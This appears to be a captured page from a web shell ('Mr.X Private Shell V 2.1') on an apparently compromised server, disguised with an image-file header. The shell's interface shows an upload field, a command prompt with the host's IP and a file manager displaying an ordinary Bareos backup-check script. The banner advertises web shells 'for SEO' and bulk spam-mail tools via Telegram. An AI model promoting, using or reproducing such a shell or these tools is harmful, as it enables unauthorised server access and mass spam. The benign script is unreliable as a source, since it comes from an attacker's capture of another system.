����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

antiaginglove@216.73.216.231: ~ $
#
# Check that Bareos is installed and configured
#

mapfile -t clients < <( bcommand ".clients" )

if (( ${#clients[@]} == 0 )); then
    Error "No Bareos clients found"
fi

if [ "$BAREOS_CLIENT" ]; then
    if ! IsInArray "$BAREOS_CLIENT" "${clients[@]}"; then
        Error "Bareos Client ($BAREOS_CLIENT) is not available. Available clients:" "${clients[@]}"
    fi
else
    if (( ${#clients[@]} == 1 )); then
        BAREOS_CLIENT="${clients[0]}"
    elif IsInArray "$HOSTNAME-fd" "${clients[@]}"; then
        BAREOS_CLIENT="$HOSTNAME-fd"
    else
        Error "Could not determine this system as Bareos client, no BAREOS_CLIENT specified."
    fi
    {
        echo "# added by prep/BAREOS/default/500_check_bareos_client_configured.sh"
        echo "BAREOS_CLIENT=$BAREOS_CLIENT"
        echo
    } >> "$ROOTFS_DIR/etc/rear/rescue.conf"
fi

# bareos_ensure_client_is_available exists on error.
bareos_ensure_client_is_available "$BAREOS_CLIENT"

LogPrint "Using '$BAREOS_CLIENT' as BAREOS_CLIENT."

Filemanager

Name Type Size Permission Actions
400_prep_bareos.sh File 273 B 0644
450_check_bareos_config_files.sh File 284 B 0644
460_check_bareos_director.sh File 562 B 0644
500_check_bareos_client_configured.sh File 1007 B 0644
510_check_bareos_filesets.sh File 2.81 KB 0644
550_check_bareos_restore_jobs.sh File 1.03 KB 0644
570_check_bareos_plugin_dir.sh File 338 B 0644